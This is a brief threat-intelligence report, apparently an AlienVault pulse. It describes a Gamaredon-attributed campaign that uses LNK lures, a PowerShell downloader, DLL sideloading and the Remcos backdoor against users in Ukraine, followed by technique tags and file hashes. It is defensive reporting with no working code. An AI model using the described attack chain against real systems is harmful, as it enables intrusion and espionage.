A campaign targeting users in Ukraine with malicious LNK files has been observed since November 2024. The files, using Russian words related to troop movements as lures, run a PowerShell downloader contacting geo-fenced servers in Russia and Germany. The second stage payload uses DLL side loading to execute the Remcos backdoor. The activity is attributed to the Gamaredon threat actor group with medium confidence. The campaign uses the invasion of Ukraine as a theme in phishing attempts, distributing LNK files disguised as Office documents. The servers used are mostly hosted by GTHost and HyperHosting ISPs. The attack chain involves DLL sideloading to load the Remcos backdoor, which communicates with a C2 server on a specific port. Author: AlienVault
Related Tags:
gthost
LNK files
DLL Sideloading
T1547.001
T1059.001
Russian Federation
Germany
T1071.001
remcos
Associated Indicators:
79AF449339EB1410E8F3ED8D7FE7649B079E0143A06EF91CC78F296B0E927901
9106082E3858BD3EF9C3F2B7B9558F751501068CB9111D4C0D3443B89A6A4F53
CDD21E4F9FF1D1CFCF4888342FA2BE5452EB3CBE7BA28E4E98FA44C879FE0265
693874FCF694A9A9AD04FE75D96DE7FE9EBE2E07EE1441C79AC3E8EB8AEB06B5
83024C7A9BA256A36FB9B751926170C08DD4DAA1866C119856CD091B1275897F
D4FBC5702731A01D96CBAA21BD60333F1D03A994ADB5B931687281282C938F12
A73226550F0B97C3F25411BA62181AA011E8410DEC4A1444412F40114704D4C2
15A5E11EA8F416F7D27D02CE876BFA8DCD22CDEDB93764BFFC8DB4C5A922AE18
F76DFAAB6E248D88241A17B5A58FD2405D0D1954364BCE9144156EBA3904DD6A